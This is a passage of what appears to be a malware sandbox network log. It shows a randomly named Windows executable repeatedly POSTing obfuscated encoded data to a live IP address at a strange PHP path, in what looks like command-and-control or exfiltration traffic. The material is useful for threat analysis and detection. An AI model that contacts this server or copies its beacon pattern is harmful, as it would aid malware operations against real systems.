                                                                                                                                                                  Jan 3, 2025 09:08:13.824251890 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:13.954063892 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:13 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  61192.168.2.44990286.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:14.089607000 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:14.441889048 CET2576OUTData Raw: 5b 5c 5e 58 58 5e 50 58 54 5b 59 5a 5b 53 57 5d 5f 57 5a 5b 52 55 50 49 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [\^XX^PXT[YZ[SW]_WZ[RUPI_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%<!\698U%,*]"'4>',&6>!;<0<D00(9#Y'$X.1
                                                                                                                                                                  Jan 3, 2025 09:08:14.791712999 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:14.929802895 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:14 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  62192.168.2.44990786.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:15.065152884 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:15.410759926 CET2576OUTData Raw: 5e 56 5b 5a 5d 59 55 5a 54 5b 59 5a 5b 52 57 53 5f 50 5a 5a 52 50 50 48 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^V[Z]YUZT[YZ[RWS_PZZRPPH_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&?=5\#9$T2(8)$:2=W"U#;(]0C' ))#Y'$X.5
                                                                                                                                                                  Jan 3, 2025 09:08:15.764836073 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:15.898154020 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:15 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  63192.168.2.44991286.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:16.023545027 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:16.379594088 CET2576OUTData Raw: 5b 50 5b 5c 58 57 50 5c 54 5b 59 5a 5b 55 57 5e 5f 52 5a 54 52 5d 50 49 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [P[\XWP\T[YZ[UW^_RZTR]PI_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%+X5^#:(V$<0D(+"_0$='?5%#^(X%9B&?,<)#Y'$X.)
                                                                                                                                                                  Jan 3, 2025 09:08:16.704090118 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:16.834695101 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:16 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  64192.168.2.44991886.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:16.959903002 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:17.323982000 CET2576OUTData Raw: 5b 52 5e 59 58 58 55 5b 54 5b 59 5a 5b 53 57 52 5f 55 5a 5b 52 54 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [R^YXXU[T[YZ[SWR_UZ[RTP@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&(=!Z!:8R2?,A>;%3'*&9!B)T7]%97&?T<9#Y'$X.1
                                                                                                                                                                  Jan 3, 2025 09:08:17.644254923 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:17.774085045 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:17 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  65192.168.2.44992686.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:17.896159887 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:18.254328012 CET2576OUTData Raw: 5e 57 5e 58 58 5f 50 5c 54 5b 59 5a 5b 52 57 58 5f 56 5a 59 52 5d 50 48 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^W^XX_P\T[YZ[RWX_VZYR]PH_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&@(-Z"9 V2?#=!0&%?>!$%P!(439/3<#+#Y'$X.5
                                                                                                                                                                  Jan 3, 2025 09:08:18.578382015 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:18.706142902 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:18 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  66192.168.2.44993386.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:18.823206902 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2164
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:19.176282883 CET2164OUTData Raw: 5b 51 5e 5a 58 58 55 5a 54 5b 59 5a 5b 50 57 58 5f 53 5a 5d 52 54 50 44 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [Q^ZXXUZT[YZ[PWX_SZ]RTPD_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%<.53%$=+=$$.'<&"T7^,]$4D0<8W+)#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:19.513145924 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:19.642067909 CET380INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:19 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 0d 1d 27 01 32 02 32 5b 3e 59 2f 1d 31 33 21 59 22 56 2c 15 2f 0e 08 44 36 3f 35 59 32 38 3f 0f 3f 03 2e 41 3f 0d 00 0e 34 2d 25 56 3c 0a 28 5d 03 10 39 5c 3f 04 2f 5c 2a 00 2a 06 3a 37 0e 07 27 27 27 05 29 20 2d 56 32 2c 26 57 22 13 2c 0f 3e 0a 21 1d 24 02 3c 5b 2a 30 01 1d 27 17 20 54 0b 17 27 56 27 20 0d 58 26 38 04 02 2a 24 3b 05 27 39 21 50 35 12 00 57 37 00 38 5f 2c 1e 3e 0b 33 38 0f 52 29 2e 37 56 26 14 03 01 24 2b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                  Data Ascii: '22[>Y/13!Y"V,/D6?5Y28??.A?4-%V<(]9\?/\**:7''') -V2,&W",>!$<[*0' T'V' X&8*$;'9!P5W78_,>38R).7V&$+.\#(U4WP


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  67192.168.2.44993486.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:18.837618113 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:19.191797972 CET2576OUTData Raw: 5b 54 5e 5f 5d 5d 55 5b 54 5b 59 5a 5b 55 57 5b 5f 57 5a 58 52 51 50 43 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [T^_]]U[T[YZ[UW[_WZXRQPC_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%)>6*R1,,@*;'$*2<5V6B)7^7$ ';(#Y'$X.)
                                                                                                                                                                  Jan 3, 2025 09:08:19.554965019 CET25INHTTP/1.1 100 Continue


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  68192.168.2.44994086.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:19.773179054 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:20.130130053 CET2576OUTData Raw: 5b 5d 5e 58 58 56 50 5b 54 5b 59 5a 5b 5e 57 58 5f 50 5a 5a 52 56 50 44 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: []^XXVP[T[YZ[^WX_PZZRVPD_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&D+2!'$,=+20-',6!! (0<$/;(#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:20.480917931 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:20.618037939 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:20 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  69192.168.2.44994586.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:20.742124081 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:21.098361015 CET2576OUTData Raw: 5e 51 5b 5f 58 5c 50 51 54 5b 59 5a 5b 53 57 5e 5f 53 5a 5f 52 5c 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^Q[_X\PQT[YZ[SW^_SZ_R\PF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&D+.-\")0%;*(2%49]1<!R6-U!+?')4A'0+)#Y'$X.1
                                                                                                                                                                  Jan 3, 2025 09:08:21.415244102 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:21.541315079 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:21 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  70192.168.2.44995086.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:21.665700912 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:22.020644903 CET2576OUTData Raw: 5b 55 5e 5d 5d 5a 50 51 54 5b 59 5a 5b 5e 57 5c 5f 51 5a 5c 52 5d 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [U^]]ZPQT[YZ[^W\_QZ\R]PF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&E<>#9$T&/,*+>[$4*1*65U ([$*'0'+9#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:08:22.352859974 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:22.482733965 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:22 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  71192.168.2.44995586.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:22.647787094 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:23.006690979 CET2576OUTData Raw: 5b 5d 5e 5f 58 58 50 5e 54 5b 59 5a 5b 52 57 5c 5f 50 5a 5a 52 5d 50 43 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: []^_XXP^T[YZ[RW\_PZZR]PC_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&(X-_",W&<#(+6Z$=]&?!!T ?39@&/ ?#Y'$X.5
                                                                                                                                                                  Jan 3, 2025 09:08:23.484846115 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:23.614218950 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:23 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  72192.168.2.44996186.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:08:23.739649057 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:24.098089933 CET2576OUTData Raw: 5e 51 5e 50 58 5b 50 5c 54 5b 59 5a 5b 5e 57 52 5f 51 5a 5e 52 56 50 45 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
